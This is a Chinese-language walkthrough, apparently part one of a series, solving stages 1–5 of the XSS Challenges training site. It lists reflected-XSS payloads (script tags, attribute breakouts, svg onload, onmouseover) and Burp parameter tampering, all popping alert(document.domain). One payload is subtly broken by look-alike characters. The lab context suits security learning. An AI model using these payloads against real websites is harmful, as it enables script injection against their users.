XSS训练网站XSS Challenges所有题目解（上篇）

XSS网站：网站（点我进入）

中篇链接：我是中篇
下篇链接：我是下篇------待完成

PS:Hint有提示，选中就会显示

Stage #1 简单XSS

很简单,输入下列代码进去解决问题

<script>alert(document.domain);</script>

Stage #2 属性中的XSS

提示：close the current tag and add SCRIPT tag…
使用属性来进行XSS
F12查看源码，发现有value

这就考查到我们怎么去闭合value

解法一

"><script>alert(document.domain);</script>

解法二

使用onmouseover事件

" onmouseover=alert(document.domain);>

Stage #3 列表中的XSS

查看源码，发现文本框中构成不了XSS，代码被转义了

所以考虑列表中的XSS

使用burpsuite抓包后

使用如下代码

"><script>alert(document.domain);</script>

形成如下payload即可

p1=123&p2="><script>alert(document.domain);</script>

Stage #4 隐藏参数中的XSS

老样子F12查看源码
发现输入框仍然被转义
使用burpsuite抓包后发现如下情况
先在列表中使用XSS，发现列表中的XSS被转义了

解法一

F12然后使用ctrl+f搜索抓包出现的参数hackme
阅读代码后
发现能进行XSS，那就老样子
使用burpsuite抓包把下列代码添加到hackme参数里即可

"><script>alert(document.domain);</script>

解法二

使用svg添加到hackme参数即可

"><svg onload=alert(document.domain);>%0a

Stage #5 限制输入长度的XSS

文本框输入后发现限制了长度
F12查看源码，发现maxlength=“15”
直接把15改为100，然后输入一下代码即可（三种都行）

"><svg onload=alert(document.domain);>%0a
或
"><script>alert(document.domain);</script>
或
" οnmοuseοver="alert(document.domain)">